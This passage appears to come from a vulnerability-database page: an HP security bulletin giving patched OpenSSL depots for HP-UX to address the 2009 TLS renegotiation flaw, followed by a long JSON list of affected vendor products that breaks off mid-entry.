ftp.usa.hp.com sb02482 Secure12
HP-UX Release Depot name SHA-1 Hash
B.11.11 PA (32 and 64) OpenSSL_A.00.09.08l.001_HP-UX_B.11.11_32+64.depot 2efb-e45e-78a7-17d0-11e9-5c10-3753-0585-6fde-36c4
B.11.23 (PA and IA) OpenSSL_A.00.09.08l.002_HP-UX_B.11.23_IA-PA.depot 2794-2f77-48a4-3316-a8b9-d213-7243-8e1b-7336-95a2
B.11.31 (PA and IA) OpenSSL_A.00.09.08l.003_HP-UX_B.11.31_IA-PA.depot 7be7-25a2-d3c4-0dce-761d-eba0-2782-8788-3bf8-02ca
Note: OpenSSL vA.00.09.08l disables renegotiation. Although renegotiation is thought to be rarely used,
applications should be tested to evaluate the impact of installing OpenSSL vA.00.09.08l.
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08l or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security
Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a
specific HP-UX system. It can also download patches and create a depot automatically. For more information
see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN action: install revision A.00.09.08l.001 or subsequent
HP-UX B.11.23
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-LIB.2 openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PRNG.2 openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-RUN.2 action: install revision A.00.09.08l.002 or subsequent
HP-UX B.11.31
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-LIB.2 openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PRNG.2 openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-RUN.2 action: install revision A.00.09.08l.003 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) 25 November 2009 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
- The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAksNs5IACgkQ4B86/C0qfVmJNQCeMd6pno2UZMwhJYB8yaKTw3Ta H6EAni+Jh3ebmTxXb0gfH5eefN9xqKO3 =h0Pb -----END PGP SIGNATURE----- . HP Secure Web Server (SWS) for OpenVMS (based on Apache) V2.1-1 and earlier.
Kit Name Location
HP SWS V2.2 for OpenVMS Alpha and OpenVMS Integrity servers
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "unified communications manager 5.1",
"scope": null,
"trust": 2.1,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "nginx",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "0.1.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.04"
},
{
"_id": null,
"model": "nginx",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "0.8.22"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "7.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "8.04"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "10.04"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "12"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.10"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "10.10"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "11"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "8.10"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "14"
},
{
"_id": null,
"model": "nss",
"scope": "lte",
"trust": 1.0,
"vendor": "mozilla",
"version": "3.12.4"
},
{
"_id": null,
"model": "gnutls",
"scope": "lte",
"trust": 1.0,
"vendor": "gnu",
"version": "2.8.5"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0"
},
{
"_id": null,
"model": "openssl",
"scope": "lte",
"trust": 1.0,
"vendor": "openssl",
"version": "0.9.8k"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "13"
},
{
"_id": null,
"model": "http server",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "2.2.14"
},
{
"_id": null,
"model": "jre 17",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "sdk 08",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jdk 1.5.0 16",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 05",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "sdk 10",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jdk 14",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "sdk 1.4.2 25",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 06",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 05",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jdk 1.6.0 03",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "sdk 1.4.2 11",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 10",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 01",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 1.5.0 11",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 22",
"scope": "ne",
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 1.5.0 24",
"scope": "ne",
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "sdk 24",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jre",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "sdk 15",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "sdk 07",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jre 07",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.6.0 11",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.5.0 17",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 03",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 01",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "sdk 06",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jdk 10",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 02",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jdk 1.5.0 23",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 04",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 05",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "sdk 1.4.2 16",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 19",
"scope": "ne",
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 16",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 1.5.0 20",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 18",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jdk 11",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 0 10",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 1.5.0 10",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 03",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "sdk 1.4.2 14",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.5.0 14",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk .0 05",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 06",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.5.0 13",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "sdk 1.4.2 17",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 15",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 21",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 15",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 1.6.0 18",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 21",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 15",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "sdk 1.4.2 12",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 02",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 22",
"scope": "ne",
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 15",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "sdk 1.4.2 26",
"scope": "ne",
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 17",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "sdk 09",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jre 13",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "sdk",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "sdk 1.4.2 18",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 17",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jdk 18",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "sdk 1.4.2 22",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 02",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "sdk 04",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jre 1.6.0 01",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 12",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 07",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "sdk 05",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "jdk 14",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 02",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "ace module a2",
"scope": null,
"trust": 0.9,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "sdk 03",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "sdk 1.4.2 19",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.5.0 12",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 13",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.5.0 13",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 22",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "sdk 1.4.2 20",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 20",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 04",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 04",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.5.0 20",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.5.0 23",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "sdk 1.4.2 13",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 06",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.6.0 19",
"scope": "ne",
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 18",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 14",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 22",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "iis",
"scope": "eq",
"trust": 0.9,
"vendor": "microsoft",
"version": "7.0"
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "barracuda",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian gnu linux",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "gnutls",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hewlett packard",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"_id": null,
"model": "jdk 01-b06",
"scope": "eq",
"trust": 0.6,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.5.0.0 09",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk .0 04",
"scope": "eq",
"trust": 0.6,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "ace appliance a1",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "4710"
},
{
"_id": null,
"model": "css11500 content services switch s",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "7.30"
},
{
"_id": null,
"model": "jdk 1.5.0.0 08",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "ace application control engine module 3.0 a2",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "jdk .0 03",
"scope": "eq",
"trust": 0.6,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jdk 1.5.0 12",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 2",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 07-b03",
"scope": "eq",
"trust": 0.6,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jdk 06",
"scope": "eq",
"trust": 0.6,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "jre 1.5.0.0 08",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.5.0.0 09",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.5.0.0 11",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 11-b03",
"scope": "eq",
"trust": 0.6,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "unified communications manager su1",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "6.1"
},
{
"_id": null,
"model": "jre 1.5.0.0 07",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 01",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified computing system blade-server 4.0 n2",
"scope": "ne",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 20",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "css11500 content services switch s",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "7.20"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "0.9.6f"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "0.9.6g"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "0.9.6i"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "0.9.6c"
},
{
"_id": null,
"model": "http server",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.0.32"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "0.9.6h"
},
{
"_id": null,
"model": "windows xp home sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "windows vista edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "x640"
},
{
"_id": null,
"model": "java system directory server patch6",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "opensolaris build snv 95",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3"
},
{
"_id": null,
"model": "application velocity system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"_id": null,
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.42.3"
},
{
"_id": null,
"model": "jboss enterprise web server for rhel es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "41.0"
},
{
"_id": null,
"model": "linux enterprise sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "unified ip phone",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.2(1)"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(3)9"
},
{
"_id": null,
"model": "cosminexus client",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "project openssl g",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.6.4"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "2.2"
},
{
"_id": null,
"model": "unified intelligent contact management enterprise",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(1)"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16009.3.1"
},
{
"_id": null,
"model": "enterprise linux as extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "windows xp professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "x64"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(2)"
},
{
"_id": null,
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "weblogic server ga",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.0"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(3)"
},
{
"_id": null,
"model": "windows server for 32-bit systems",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20080"
},
{
"_id": null,
"model": "wanjet",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.0"
},
{
"_id": null,
"model": "unified contact center hosted",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(5)"
},
{
"_id": null,
"model": "application networking manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "2.0"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.63"
},
{
"_id": null,
"model": "windows xp tablet pc edition sp3",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2.41"
},
{
"_id": null,
"model": "project openssl b-36.8",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "windows vista business sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "oracle10g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0.4"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.2(1.16)"
},
{
"_id": null,
"model": "unified callmanager 3.3 sr2a",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 100",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.173.0"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0.0.201"
},
{
"_id": null,
"model": "blackberry enterprise server for exchange mr1",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.2"
},
{
"_id": null,
"model": "opensolaris build snv 123",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34009.1.1"
},
{
"_id": null,
"model": "linux alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "java system web server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
